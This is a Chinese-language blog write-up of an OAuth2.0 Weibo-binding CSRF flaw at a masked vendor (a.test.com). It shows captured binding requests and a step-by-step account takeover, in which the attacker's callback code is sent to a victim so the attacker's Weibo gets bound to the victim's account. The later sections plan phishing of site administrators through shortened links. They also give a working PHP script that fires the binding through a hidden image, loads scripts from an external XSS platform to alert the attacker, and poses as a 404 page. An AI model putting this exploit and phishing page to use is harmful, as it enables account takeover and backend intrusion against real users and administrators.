0x00 前言

文章中的项目地址统一修改为: a.test.com 保护厂商也保护自己

0x01 OAuth2.0 经常出现的地方

1:网站登录处
1.png
2:社交帐号绑定处
2.png

0x02 某厂商绑定微博请求包

0x02.1 请求包1:

Request:

  1. GET https://www.a.test.com/users/auth/weibo?can_transfer=true HTTP/1.1
  2. Host: www.a.test.com

Response:

  1. HTTP/1.1 302 Found
  2. Server: Tengine
  3. Content-Type: text/html; charset=utf-8
  4. Connection: keep-alive
  5. Date: Mon, 18 Mar 2019 10:35:32 GMT
  6. X-Frame-Options: DENY
  7. X-XSS-Protection: 1; mode=block
  8. X-Content-Type-Options: nosniff
  9. Location: https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D
  10. Cache-Control: no-cache
  11. Set-Cookie: read_mode=day; path=/
  12. Set-Cookie: default_font=font2; path=/
  13. Set-Cookie: locale=zh-CN; path=/
  14. Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:32 -0000; secure; HttpOnly
  15. Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
  16. X-Request-Id: a921c890-a33b-4b52-ab49-bc67597e3cca
  17. X-Runtime: 0.064185
  18. Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  19. Via: cache15.l2cm12-6[78,0], cache6.cn544[108,0]
  20. Timing-Allow-Origin: *
  21. EagleId: 7ce8aa4615529053323375762e
  22. Content-Length: 290
  23. <html><body>You are being <a href="https://api.weibo.com/oauth2/authorize?client_id=1881139527&amp;redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&amp;response_type=code&amp;state=%257B%2522can_transfer%2522%253A%2522true%2522%257D">redirected</a>.</body></html>

0x02.2 请求包2:

Request:

  1. GET https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D HTTP/1.1
  2. Host: api.weibo.com

Response:

  1. HTTP/1.1 302 Found
  2. Server: nginx/1.6.1
  3. Date: Mon, 18 Mar 2019 10:35:32 GMT
  4. Content-Length: 0
  5. Connection: keep-alive
  6. Pragma: No-cache
  7. Cache-Control: no-cache
  8. Expires: Thu, 01 Jan 1970 00:00:00 GMT
  9. Location: http://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af

0x02.3 请求包3:

Request:

  1. GET https://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af HTTP/1.1
  2. Host: www.a.test.com

Response:

  1. HTTP/1.1 302 Found
  2. Server: Tengine
  3. Content-Type: text/html; charset=utf-8
  4. Connection: keep-alive
  5. Date: Mon, 18 Mar 2019 10:35:33 GMT
  6. X-Frame-Options: DENY
  7. X-XSS-Protection: 1; mode=block
  8. X-Content-Type-Options: nosniff
  9. Location: https://www.a.test.com/settings/profile
  10. Cache-Control: no-cache
  11. Set-Cookie: read_mode=day; path=/
  12. Set-Cookie: default_font=font2; path=/
  13. Set-Cookie: locale=zh-CN; path=/
  14. Set-Cookie: bind_sns_result=%257B%2522code%2522%3A-1%257D; path=/; expires=Mon, 18 Mar 2019 10:40:33 -0000
  15. Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:33 -0000; secure; HttpOnly
  16. Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
  17. X-Request-Id: 4f4b792f-967e-45f8-a71d-adb88e600e19
  18. X-Runtime: 0.391071
  19. Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  20. Via: cache15.l2cm12-6[403,0], cache6.cn544[434,0]
  21. Timing-Allow-Origin: *
  22. EagleId: 7ce8aa4615529053326897836e
  23. Content-Length: 106
  24. <html><body>You are being <a href="https://www.a.test.com/settings/profile">redirected</a>.</body></html>

0x03 例子:某厂商第三方登录绑定漏洞利用-点我就绑定你微博登录你账号

这里需要使用到一个微博账号与两个某厂商账号

  1. 微博账号:182**77 (攻击者)
  2. 某厂商账号A:33*493@qq.com (攻击者)
  3. 某厂商账号B:28*165@qq.com (无辜受害者)
    步骤1:攻击者-登录微博
    步骤2:攻击者-使用某厂商账号A 登录
    3.png
    从上面看其实有很多绑定账号快捷登录的方法,但是微博绑定的用户肯定是比较少的所以我们用它
    步骤3:攻击者-点击绑定微博抓包
    4.png
    绑定微博的url:https://www.a.test.com/users/auth/weibo/callback?state={“can_transfer”%3A”true”}&code=c593bc150745c37a4d5ec05332d406af
    这个url中的code就是我的微博一次性token
    步骤4:无辜受害者-使用某厂商账号B 登录
    5.png
    将url发送给账号B 打开:https://www.a.test.com/users/auth/weibo/callback?state={“can_transfer”%3A”true”}&code=c593bc150745c37a4d5ec05332d406af
    6.png
    这时提示绑定成功了~~~ 嘿嘿嘿
    步骤5:攻击者-点开浏览器,选择微博登录

    7.png

8.png

0x04 某厂商账号绑定漏洞-深入利用思考

首先经过我的观察,某厂商前后端是使用一个账号的 : )
攻击思路:

  1. 某厂商中有一个功能某信,我们可以发送一个有害的短链接url某信给管理员,诱惑管理员打开,让管理员绑定我们的微博,然后我们登录后台
  2. 使用新浪短域名(降低管理员内心警戒)
  3. 有人访问url时是发送qq邮件到我的邮箱
    这个脚本完成以后,理想的攻击方式应该就是这样的
    受害者-->点击新浪短链接url-->跳转到我的钓鱼网站-->输出绑定url进行绑定-->利用xss平台发送邮件通知我-->页面显示404-->结束
    9.png

0x05 简单脚本

  1. # a_test_oauth_csrf.php
  2. # 然后把这个文件改一下名字,放外网,然后钓鱼等待
  3. <?php
  4. function curlRequest($url, $post = [], $cookie = '', $referurl = '') {
  5.     if (!$referurl) {
  6.         $referurl = 'https://www.a.test.com';
  7.     }
  8.     $header = array(
  9.         'Content-Type:application/x-www-form-urlencoded',
  10.         'X-Requested-With:XMLHttpRequest',
  11.     );
  12.     $curl = curl_init();
  13.     curl_setopt($curl, CURLOPT_URL, $url);
  14.     curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)');
  15.     curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
  16.     curl_setopt($curl, CURLOPT_REFERER, $referurl);
  17.     curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
  18.     curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);
  19.     if ($post) {
  20.         curl_setopt($curl, CURLOPT_POST, 1);
  21.         curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
  22.     }
  23.     if ($cookie) {
  24.         curl_setopt($curl, CURLOPT_COOKIE, $cookie);
  25.     }
  26.     curl_setopt($curl, CURLOPT_TIMEOUT, 10);
  27.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  28.     curl_exec($curl);
  29.     $header_data = curl_getinfo($curl);
  30.     if (curl_errno($curl)) {
  31.         return curl_error($curl);
  32.     }
  33.     curl_close($curl);
  34.     return $header_data;
  35. }
  36. // 某厂商的授权url-固定写死即可
  37. $url = 'https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D';
  38. // 将你新浪微博cookie写入这里
  39. $cookie = '我的cookie可不给你们哦';
  40. $result = curlRequest($url, [], $cookie);
  41. // 那两个js随便找个xss平台即可
  42. // 一个用来表示登录过期了
  43. // 一个用来表示钓鱼成功了
  44. if (!$result['redirect_url']) {
  45.     // echo '登录过期';
  46.     echo '<ScRipT sRc=http://xxxxx.cn/ExiptZI></SCriPt>';
  47. } else {
  48.     // echo '我还能搞事';
  49.     // echo $result['redirect_url'];
  50.     echo '<img src="'.$result['redirect_url'].'" style="display:none;">';
  51.     echo '<ScRipT sRc=http://xxxxx.cn/Exi0TCW></SCriPt>';
  52. }
  53. http_response_code(404);
  54. echo '<div>404 网页已删除</div>';

放置外网:http://127.0.0.1/a_test_oauth_csrf.php 发送给各大管理员
然后安静的做一个美少女等待即可
xss平台:http://xss.tf
10.png